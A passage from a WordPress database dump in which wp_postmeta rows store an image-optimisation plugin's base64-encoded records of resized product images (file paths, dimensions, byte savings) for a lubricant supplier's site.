VsaWMtb2lsLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtaHlkcmF1bGljLW9pbC0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLWh5ZHJhdWxpYy1vaWwtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjY4NywidGltZSI6MTQ4MzU2NzY3OSwiaWQiOjE2NTR9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29358, 1653, 'wpfc_optimisation_reduction', '8884'); 
INSERT INTO `wp_postmeta` VALUES (29359, 1653, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtY29tcHJlc3Nvci1sdWJyaWNhbnQuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1jb21wcmVzc29yLWx1YnJpY2FudC5qcGciLCJ3aWR0aCI6NTQ3MiwiaGVpZ2h0IjozNjQ4LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTY3NjgzLCJpZCI6IjE2NTMifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWNvbXByZXNzb3ItbHVicmljYW50LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtY29tcHJlc3Nvci1sdWJyaWNhbnQtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy1jb21wcmVzc29yLWx1YnJpY2FudC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NTA3LCJ0aW1lIjoxNDgzNTY3Njg3LCJpZCI6MTY1M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1jb21wcmVzc29yLWx1YnJpY2FudC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWNvbXByZXNzb3ItbHVicmljYW50LTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtY29tcHJlc3Nvci1sdWJyaWNhbnQtODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjg4NiwidGltZSI6MTQ4MzU2NzY5MSwiaWQiOjE2NTN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtY29tcHJlc3Nvci1sdWJyaWNhbnQtNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1jb21wcmVzc29yLWx1YnJpY2FudC03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLWNvbXByZXNzb3ItbHVicmljYW50LTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjo5MjIsInRpbWUiOjE0ODM1Njc2OTUsImlkIjoxNjUzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWNvbXByZXNzb3ItbHVicmljYW50LTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWNvbXByZXNzb3ItbHVicmljYW50LTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy1jb21wcmVzc29yLWx1YnJpY2FudC0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjozMDA2LCJ0aW1lIjoxNDgzNTY3NzAwLCJpZCI6MTY1M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1jb21wcmVzc29yLWx1YnJpY2FudC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWNvbXByZXNzb3ItbHVicmljYW50LTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtY29tcHJlc3Nvci1sdWJyaWNhbnQtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjQ3MSwidGltZSI6MTQ4MzU2NzcwMywiaWQiOjE2NTN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtY29tcHJlc3Nvci1sdWJyaWNhbnQtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1jb21wcmVzc29yLWx1YnJpY2FudC0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLWNvbXByZXNzb3ItbHVicmljYW50LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0MzAsInRpbWUiOjE0ODM1Njc3MDcsImlkIjoxNjUzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWNvbXByZXNzb3ItbHVicmljYW50LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtY29tcHJlc3Nvci1sdWJyaWNhbnQtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy1jb21wcmVzc29yLWx1YnJpY2FudC0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NDQzLCJ0aW1lIjoxNDgzNTY3NzEwLCJpZCI6MTY1M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1jb21wcmVzc29yLWx1YnJpY2FudC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWNvbXByZXNzb3ItbHVicmljYW50LTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtY29tcHJlc3Nvci1sdWJyaWNhbnQtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjc2NSwidGltZSI6MTQ4MzU2NzcxNCwiaWQiOjE2NTN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1jb21wcmVzc29yLWx1YnJpY2FudC0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWNvbXByZXNzb3ItbHVicmljYW50LTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtY29tcHJlc3Nvci1sdWJyaWNhbnQtMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjQyNSwidGltZSI6MTQ4MzU2NzcxNywiaWQiOjE2NTN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1jb21wcmVzc29yLWx1YnJpY2FudC0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWNvbXByZXNzb3ItbHVicmljYW50LTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtY29tcHJlc3Nvci1sdWJyaWNhbnQtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjUwNywidGltZSI6MTQ4MzU2NzcyMSwiaWQiOjE2NTN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1jb21wcmVzc29yLWx1YnJpY2FudC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWNvbXByZXNzb3ItbHVicmljYW50LTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtY29tcHJlc3Nvci1sdWJyaWNhbnQtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjUyMiwidGltZSI6MTQ4MzU2NzcyNCwiaWQiOjE2NTN9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29360, 1652, 'wpfc_optimisation_reduction', '13397'); 
INSERT INTO `wp_postmeta` VALUES (29361, 1652, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtZ2Vhci1ib3gtbHVicmljYW50LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtZ2Vhci1ib3gtbHVicmljYW50LmpwZyIsIndpZHRoIjo0ODAwLCJoZWlnaHQiOjMyMDAsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1Njc3MjksImlkIjoiMTY1MiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtZ2Vhci1ib3gtbHVicmljYW50LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtZ2Vhci1ib3gtbHVicmljYW50LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtZ2Vhci1ib3gtbHVicmljYW50LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo3NDEsInRpbWUiOjE0ODM1Njc3MzIsImlkIjoxNjUyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWdlYXItYm94LWx1YnJpY2FudC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWdlYXItYm94LWx1YnJpY2FudC04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLWdlYXItYm94LWx1YnJpY2FudC04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MTM2MiwidGltZSI6MTQ4MzU2NzczNiwiaWQiOjE2NTJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtZ2Vhci1ib3gtbHVicmljYW50LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtZ2Vhci1ib3gtbHVicmljYW50LTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtZ2Vhci1ib3gtbHVicmljYW50LTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoxMjUyLCJ0aW1lIjoxNDgzNTY3NzQwLCJpZCI6MTY1Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1nZWFyLWJveC1sdWJyaWNhbnQtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtZ2Vhci1ib3gtbHVicmljYW50LTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy1nZWFyLWJveC1sdWJyaWNhbnQtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6NDcwNiwidGltZSI6MTQ4MzU2Nzc0NSwiaWQiOjE2NTJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtZ2Vhci1ib3gtbHVicmljYW50LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtZ2Vhci1ib3gtbHVicmljYW50LTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtZ2Vhci1ib3gtbHVicmljYW50LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo2NDUsInRpbWUiOjE0ODM1Njc3NDgsImlkIjoxNjUyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWdlYXItYm94LWx1YnJpY2FudC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWdlYXItYm94LWx1YnJpY2FudC0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLWdlYXItYm94LWx1YnJpY2FudC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NTQ5LCJ0aW1lIjoxNDgzNTY3NzUxLCJpZCI6MTY1Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1nZWFyLWJveC1sdWJyaWNhbnQtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1nZWFyLWJveC1sdWJyaWNhbnQtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy1nZWFyLWJveC1sdWJyaWNhbnQtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjYyOCwidGltZSI6MTQ4MzU2Nzc1NSwiaWQiOjE2NTJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtZ2Vhci1ib3gtbHVicmljYW50LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtZ2Vhci1ib3gtbHVicmljYW50LTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtZ2Vhci1ib3gtbHVicmljYW50LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxMTAxLCJ0aW1lIjoxNDgzNTY3NzU5LCJpZCI6MTY1Mn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWdlYXItYm94LWx1YnJpY2FudC0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWdlYXItYm94LWx1YnJpY2FudC0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLWdlYXItYm94LWx1YnJpY2FudC0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6NTk4LCJ0aW1lIjoxNDgzNTY3NzYyLCJpZCI6MTY1Mn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWdlYXItYm94LWx1YnJpY2FudC0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWdlYXItYm94LWx1YnJpY2FudC0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLWdlYXItYm94LWx1YnJpY2FudC0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6OTE4LCJ0aW1lIjoxNDgzNTY3NzY1LCJpZCI6MTY1Mn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWdlYXItYm94LWx1YnJpY2FudC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWdlYXItYm94LWx1YnJpY2FudC0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLWdlYXItYm94LWx1YnJpY2FudC0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6ODk3LCJ0aW1lIjoxNDgzNTY3NzY5LCJpZCI6MTY1Mn1d'); 
INSERT INTO `wp_postmeta` VALUES (29362, 1651, 'wpfc_optimisation_reduction', '8593'); 
